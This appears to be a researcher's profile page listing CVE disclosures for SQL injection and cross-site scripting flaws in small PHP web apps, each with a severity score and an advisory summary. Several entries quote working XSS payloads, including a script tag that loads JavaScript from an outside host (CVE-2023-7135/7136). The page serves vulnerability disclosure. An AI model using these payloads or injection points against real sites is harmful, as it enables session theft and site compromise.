Hamdi Sevben

30 exploits. Active since Feb 2023.
CVE-2022-40032 NOMISEC CRITICAL WRITEUP
Simple Task Managing System 1.0 - SQL Injection via login.php Username and Password Parameters
A SQL injection vulnerability in the 'username' and 'password' parameters of login.php in Simple Task Managing System version 1.0 allows attackers to execute arbitrary code and gain sensitive information.
5 stars
CVSS 9.8
CVE-2022-40347 NOMISEC CRITICAL WORKING POC
Intern Record System 1.0 - SQL Injection via Phone/Email/DeptType/Name Parameters
A SQL injection vulnerability in the 'phone', 'email', 'deptType' and 'name' parameters of /intern/controller.php in Intern Record System version 1.0 allows attackers to execute arbitrary code and gain sensitive information.
3 stars
CVSS 9.8
CVE-2022-40348 NOMISEC MEDIUM WRITEUP
Intern Record System 1.0 - Cross-Site Scripting via Name and Email Parameters
A cross-site scripting (XSS) vulnerability in the 'name' and 'email' parameters of /intern/controller.php in Intern Record System version 1.0 allows attackers to execute arbitrary code.
3 stars
CVSS 5.4
CVE-2023-7105 WRITEUP MEDIUM WRITEUP
E-Commerce Website 1.0 - SQL Injection via index_search.php Search Parameter
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been classified as critical. Affected is an unknown function of the file index_search.php. The manipulation of the argument search leads to SQL injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249000.
CVSS 4.7
CVE-2023-7106 WRITEUP MEDIUM WRITEUP
E-Commerce Website 1.0 - SQL Injection via prod_id Parameter
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file product_details.php?prod_id=11. The manipulation of the argument prod_id leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249001 was assigned to this vulnerability.
CVSS 6.3
CVE-2023-7107 WRITEUP HIGH WRITEUP
E-Commerce Website 1.0 - SQL Injection via user_signup.php Parameter Manipulation
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file user_signup.php. The manipulation of the argument firstname/middlename/email/address/contact/username leads to SQL injection. The attack may be launched remotely. VDB-249002 is the identifier assigned to this vulnerability.
CVSS 7.3
CVE-2023-7108 WRITEUP MEDIUM WRITEUP
E-Commerce Website 1.0 - Stored Cross-Site Scripting via Firstname Parameter
A vulnerability classified as problematic has been found in code-projects E-Commerce Website 1.0. This affects an unknown part of the file user_signup.php. The manipulation of the argument firstname with the input <video/src=x onerror=alert(document.domain)> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249003.
CVSS 4.3
CVE-2023-7109 WRITEUP HIGH WRITEUP
Library Management System 2.0 - SQL Injection via Username Parameter
A vulnerability classified as critical was found in code-projects Library Management System 2.0. This vulnerability affects unknown code of the file /admin/login.php. The manipulation of the argument username leads to SQL injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249004.
CVSS 7.3
CVE-2023-7110 WRITEUP HIGH WRITEUP
Library Management System 2.0 - SQL Injection via login.php Student Parameter
A vulnerability, which was classified as critical, has been found in code-projects Library Management System 2.0. This issue affects some unknown processing of the file login.php. The manipulation of the argument student leads to SQL injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249005 was assigned to this vulnerability.
CVSS 7.3
CVE-2023-7111 WRITEUP MEDIUM WRITEUP
Library Management System 2.0 - SQL Injection via Category Parameter
A vulnerability, which was classified as critical, was found in code-projects Library Management System 2.0. Affected is an unknown function of the file index.php. The manipulation of the argument category leads to SQL injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249006 is the identifier assigned to this vulnerability.
CVSS 6.3
CVE-2023-7124 WRITEUP MEDIUM WRITEUP
E-Commerce Site 1.0 - Cross-Site Scripting via search.php keyword parameter
A vulnerability, which was classified as problematic, was found in code-projects E-Commerce Site 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument keyword with the input <video/src=x onerror=alert(document.cookie)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249096.
CVSS 4.3
CVE-2023-7126 WRITEUP MEDIUM WRITEUP
Automated Voting System 1.0 - SQL Injection via Admin Login Username Parameter
A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability.
CVSS 6.3
CVE-2023-7127 WRITEUP MEDIUM WRITEUP
Automated Voting System 1.0 - SQL Injection via Login Component
A vulnerability classified as critical was found in code-projects Automated Voting System 1.0. This vulnerability affects unknown code of the component Login. The manipulation of the argument idno leads to SQL injection. The exploit has been disclosed to the public and may be used. VDB-249130 is the identifier assigned to this vulnerability.
CVSS 6.3
CVE-2023-7128 WRITEUP MEDIUM WRITEUP
code-projects Voting System 1.0 - SQL Injection via Admin Login Username Parameter
A vulnerability, which was classified as critical, has been found in code-projects Voting System 1.0. This issue affects some unknown processing of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to SQL injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249131.
CVSS 6.3
CVE-2023-7129 WRITEUP MEDIUM WRITEUP
code-projects Voting System 1.0 - SQL Injection via Voters Login
A vulnerability, which was classified as critical, was found in code-projects Voting System 1.0. Affected is an unknown function of the component Voters Login. The manipulation of the argument voter leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249132.
CVSS 5.5
CVE-2023-7131 WRITEUP MEDIUM WRITEUP
Intern Membership Management System 2.0 - SQL Injection via User Registration userName Parameter
A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to SQL injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability.
CVSS 6.3
CVE-2023-7132 WRITEUP LOW WRITEUP
Intern Membership Management System 2.0 - Stored Cross-Site Scripting via User Registration
A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input "><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135.
CVSS 3.5
CVE-2023-7135 WRITEUP LOW WRITEUP
code-projects Record Management System 1.0 - Cross-Site Scripting via officename Parameter
A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.
CVSS 2.4
CVE-2023-7136 WRITEUP LOW WRITEUP
code-projects Record Management System 1.0 - Cross-Site Scripting via docname Parameter in Document Type Handler
A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.
CVSS 2.4
CVE-2023-7137 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via uemail Parameter
A vulnerability, which was classified as critical, has been found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the component HTTP POST Request Handler. The manipulation of the argument uemail leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249140.
CVSS 6.3
CVE-2023-7138 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via Username Parameter in Admin Endpoint
A vulnerability, which was classified as critical, was found in code-projects Client Details System 1.0. This affects an unknown part of the file /admin of the component HTTP POST Request Handler. The manipulation of the argument username leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249141 was assigned to this vulnerability.
CVSS 6.3
CVE-2023-7139 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via HTTP POST Request Handler
A vulnerability has been found in code-projects Client Details System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/regester.php of the component HTTP POST Request Handler. The manipulation of the argument fname/lname/email/contact leads to SQL injection. The exploit has been disclosed to the public and may be used. VDB-249142 is the identifier assigned to this vulnerability.
CVSS 4.3
CVE-2023-7140 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via /admin/manage-users.php id Parameter
A vulnerability was found in code-projects Client Details System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/manage-users.php. The manipulation of the argument id leads to SQL injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249143.
CVSS 4.3
CVE-2023-7141 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via uid Parameter in /admin/update-clients.php
A vulnerability was found in code-projects Client Details System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/update-clients.php. The manipulation of the argument uid leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249144.
CVSS 4.3
CVE-2023-7142 WRITEUP MEDIUM WRITEUP
Client Details System 1.0 - SQL Injection via ID Parameter in /admin/clientview.php
A vulnerability was found in code-projects Client Details System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/clientview.php. The manipulation of the argument ID leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249145 was assigned to this vulnerability.
CVSS 4.3